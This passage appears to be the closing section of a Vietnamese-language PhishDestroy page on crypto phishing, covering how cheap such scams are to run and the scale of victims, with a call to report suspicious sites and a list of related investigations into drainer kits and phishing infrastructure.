Chi phí để thiết lập một chiến dịch lừa đảo tiền điện tử là $0 và mất dưới 30 phút. Dịch vụ lưu trữ miễn phí, dịch vụ biểu mẫu miễn phí, bot nhắn tin miễn phí. Kẻ tấn công đứng sau Trang web số 1 đã thu thập được thông tin đăng nhập từ Hơn 1.824 nạn nhân. Trang web số 4 đang hoạt động quảng cáo trả phí trên quy mô lớn. Đây không phải là chuyện của những người nghiệp dư — đây là cả một ngành công nghiệp. Cách phòng vệ duy nhất là nâng cao nhận thức.

Hãy cùng chúng tôi chống lại

PhishDestroy theo dõi và báo cáo các trang web lừa đảo tiền điện tử theo thời gian thực. Nếu bạn phát hiện một trang web đáng ngờ, hãy báo cáo cho chúng tôi — chúng tôi sẽ điều tra và nỗ lực để trang web đó bị gỡ xuống.

Các cuộc điều tra liên quan

Cuộc điều tra
Sự sụp đổ của xmrwallet.com: NameSilo đã nói dối để che giấu một tên trộm
Vụ trộm Monero kéo dài 10 năm. 3 nhà đăng ký tên miền đã can thiệp. NameSilo đã bịa đặt 7 lời nói dối.
Phân tích sâu
Mạng lưới đánh cắp tiền điện tử: Cơ sở hạ tầng bị phơi bày
Các mô hình kinh doanh “dịch vụ thoát nước” chia sẻ cơ sở hạ tầng và nhân viên vận hành như thế nào.
Bảng điều khiển lộ ra ngoài
Bảng điều khiển lừa đảo của Trust Wallet: Quyền truy cập quản trị viên đầy đủ
Chúng tôi đã xâm nhập vào bảng điều khiển quản trị của một chiến dịch lừa đảo nhắm vào Trust Wallet.
Cơ sở hạ tầng
Vạch trần cơ sở hạ tầng lừa đảo: Hệ thống backend dùng chung
Các hoạt động lừa đảo chia sẻ máy chủ, mẫu trang web và quy trình thanh toán như thế nào.

Chia sẻ cuộc điều tra này

X / Twitter Telegram Reddit LinkedIn

Các cuộc điều tra liên quan

Bảng thống kê vụ lừa đảo qua Trust Wallet: 239.000 USD bị đánh cắp, 6 đối tượng thực hiện
ĐIỀU TRA SÂU RỘNG
Bảng thống kê vụ lừa đảo qua Trust Wallet: 239.000 USD bị đánh cắp, 6 đối tượng thực hiện
Bộ công cụ Crypto Drainer: Vạch trần các đại lý phân phối Angel Drainer
ĐIỀU TRA SÂU RỘNG
Bộ công cụ Crypto Drainer: Vạch trần các đại lý phân phối Angel Drainer
Vạch trần những kẻ lừa đảo: Phân tích chi tiết 4 hệ thống hậu trường của các vụ lừa đảo
ĐIỀU TRA
Vạch trần những kẻ lừa đảo: Phân tích chi tiết 4 hệ thống hậu trường của các vụ lừa đảo